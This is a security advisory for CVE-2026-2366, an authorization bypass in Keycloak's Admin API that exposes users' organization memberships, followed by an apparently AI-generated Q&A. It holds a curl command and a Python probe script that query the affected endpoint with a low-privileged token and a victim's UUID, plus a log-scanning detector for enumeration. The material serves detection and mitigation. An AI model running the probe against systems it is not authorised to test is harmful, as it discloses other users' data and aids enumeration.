CVE-2026-2366
Authorization Bypass in Keycloak Admin API Enables Data Disclosure
Publication date: 2026-03-12
Last updated on: 2026-04-02
Assigner: Red Hat, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| keycloak | keycloak | 26.5.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-2366 is an information disclosure vulnerability in Keycloak's Admin API caused by an authorization bypass.
Specifically, the API endpoint that lists the organizations a user belongs to does not properly check permissions, allowing any authenticated user, even one without administrative privileges, to see the organization memberships of other users if they know the victim's unique identifier (UUID).
This occurs when the Organizations feature is enabled in Keycloak and the attacker holds a valid access token but lacks the necessary admin roles. [1]
How can this vulnerability impact me?
This vulnerability allows unauthorized users to obtain information about which organizations other users belong to within Keycloak.
While it does not allow modification or deletion of data, it results in a confidentiality breach by exposing potentially sensitive organizational membership information.
Such information disclosure could be leveraged for further targeted attacks or social engineering.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by calling the affected Admin API endpoint with the access token of a low-privileged authenticated user and checking whether another user's organization memberships are returned.
- Ensure the Organizations feature is enabled in Keycloak.
- Obtain a valid OIDC access token for a low-privileged user (one that holds no admin roles in the realm).
- Send a GET request to `/admin/realms/{realm}/organizations/members/{victim-uuid}/organizations`, replacing `{realm}` and `{victim-uuid}` with appropriate values.
- If the response is HTTP 200 OK and contains the victim's organization memberships, the vulnerability is present. A deployment that enforces the permission check rejects the same request with HTTP 403; an empty list returned with HTTP 200 still indicates the bypass, since the caller should not have been answered at all.

Example curl command to test the vulnerability:

```bash
curl -H "Authorization: Bearer <low-privileged-user-token>" \
  https://<keycloak-server>/admin/realms/<realm>/organizations/members/<victim-uuid>/organizations
```
[1]
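The check above as a small script, added here as an example and not code from the advisory or from the Keycloak project. It separates the verdict logic from the HTTP call so the interpretation of each response can be reviewed on its own. The helper names, the verdict strings and the status mapping (403 when the permission check is enforced, 401 for a rejected token, 404 treated as inconclusive) are assumptions based on the usual behaviour of the Keycloak Admin REST API, not something the advisory states.

```python
"""Added example: probe a Keycloak realm for the CVE-2026-2366 authorization
bypass using a low-privileged user's token.  Assumptions (not from the
advisory): helper names, verdict strings and the status-code mapping below."""
import json
import re
import urllib.error
import urllib.request

# Textual form of a UUID, which is what Keycloak uses for user ids.
UUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


def build_url(base_url, realm, victim_uuid):
    """Return the affected endpoint URL; refuse anything that is not a UUID
    so a typo cannot turn the probe into a request for some other path."""
    if not UUID_RE.match(victim_uuid):
        raise ValueError("victim id must be a UUID")
    return (f"{base_url.rstrip('/')}/admin/realms/{realm}"
            f"/organizations/members/{victim_uuid}/organizations")


def classify(status, body):
    """Map the HTTP response of the low-privileged probe to a verdict.

    A 200 whose body is a JSON array means the endpoint answered a caller
    without admin roles: the bypass is present even if the array is empty,
    because a caller that is properly checked gets 403, not [].
    """
    if status == 200:
        try:
            data = json.loads(body) if body.strip() else []
        except ValueError:
            return "inconclusive"   # 200 with a non-JSON body: likely a proxy or login page
        return "vulnerable" if isinstance(data, list) else "inconclusive"
    if status == 403:
        return "not_vulnerable"     # permission check enforced (assumed Keycloak behaviour)
    if status == 401:
        return "bad_token"          # expired token, wrong realm, or not a bearer token
    return "inconclusive"           # e.g. 404: feature disabled or unknown id (assumption)


def probe(base_url, realm, victim_uuid, token, timeout=10):
    """Send the probe.  The token must belong to a user WITHOUT admin roles,
    otherwise a 200 proves nothing."""
    req = urllib.request.Request(
        build_url(base_url, realm, victim_uuid),
        headers={"Authorization": f"Bearer {token}", "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    return classify(status, body)


if __name__ == "__main__":
    import sys
    # usage: probe.py https://keycloak.example <realm> <victim-uuid> <low-priv-token>
    print(probe(*sys.argv[1:5]))
```

Run it only against a realm you are authorised to test, and use a UUID of a user you control as the "victim" so the probe discloses nothing about anyone else.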
What immediate steps should I take to mitigate this vulnerability?
As of the last update to this page, no patch is available for this vulnerability.
Immediate mitigation steps include:
- Restrict access to the Keycloak Admin API (the `/admin/` path) to trusted networks and administrators only, for example at the reverse proxy in front of Keycloak.
- Limit or disable the Organizations feature if it is not required; the affected endpoint only exists when the feature is enabled.
- Monitor and audit HTTP access logs for requests to the affected endpoint path, in particular clients that iterate over many different member ids.
- Avoid exposing user UUIDs to low-privileged or unauthenticated users, since the attack requires the victim's UUID; note that UUIDs are not a secret by design, so this limits rather than prevents exploitation.
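A worked version of the audit step, added here as an example and not part of the advisory or of Keycloak itself. It scans an HTTP access log for requests to the affected endpoint and flags clients that successfully read the memberships of several distinct members, which is what an enumeration of user UUIDs looks like. Assumptions: the log is in Common Log Format as written by a reverse proxy in front of Keycloak, the sample lines are constructed for this example, and the threshold is a tunable of the script rather than a Keycloak setting.

```python
"""Added example: flag lookups of other users' organization memberships in an
HTTP access log.  Assumptions (not from the advisory): Common Log Format as
produced by a reverse proxy, constructed sample lines, tunable threshold."""
import re
from collections import defaultdict

# ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Path of the affected endpoint; the member id is captured to count victims.
PATH_RE = re.compile(
    r'^/admin/realms/(?P<realm>[^/]+)/organizations/members/'
    r'(?P<member>[^/?]+)/organizations/?(?:\?.*)?$'
)

# Constructed sample: 10.0.0.5 walks three member ids and gets data back,
# 10.0.0.7 is refused with 403, 10.0.0.9 hits an unrelated admin endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2026:10:01:02 +0000] "GET /admin/realms/acme/organizations/members/aaaaaaaa-1111-4111-8111-111111111111/organizations HTTP/1.1" 200 152
10.0.0.5 - - [02/Apr/2026:10:01:03 +0000] "GET /admin/realms/acme/organizations/members/bbbbbbbb-2222-4222-8222-222222222222/organizations HTTP/1.1" 200 2
10.0.0.5 - - [02/Apr/2026:10:01:04 +0000] "GET /admin/realms/acme/organizations/members/cccccccc-3333-4333-8333-333333333333/organizations HTTP/1.1" 200 97
10.0.0.7 - - [02/Apr/2026:10:02:10 +0000] "GET /admin/realms/acme/organizations/members/aaaaaaaa-1111-4111-8111-111111111111/organizations HTTP/1.1" 403 45
10.0.0.9 - - [02/Apr/2026:10:03:00 +0000] "GET /admin/realms/acme/users/aaaaaaaa-1111-4111-8111-111111111111 HTTP/1.1" 403 45
"""


def membership_lookups(lines):
    """Return every GET to the affected endpoint as a dict, whatever its status."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        p = PATH_RE.match(m.group("path"))
        if not p:
            continue
        hits.append({"ip": m.group("ip"), "realm": p.group("realm"),
                     "member": p.group("member"), "status": int(m.group("status"))})
    return hits


def enumeration_suspects(lines, threshold=3):
    """Client IPs that successfully read memberships of at least `threshold`
    distinct members.  Only 200s count: a 403 is the permission check working.
    Returns {ip: sorted list of member ids}."""
    seen = defaultdict(set)
    for hit in membership_lookups(lines):
        if hit["status"] == 200:
            seen[hit["ip"]].add(hit["member"])
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, members in enumeration_suspects(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {ip} read memberships of {len(members)} members: {members}")
```

Feed it a real log with `enumeration_suspects(open(path).read().splitlines())`; a single successful lookup by a non-admin is already a finding, so lower the threshold if the log carries the authenticated user and you can exclude administrators.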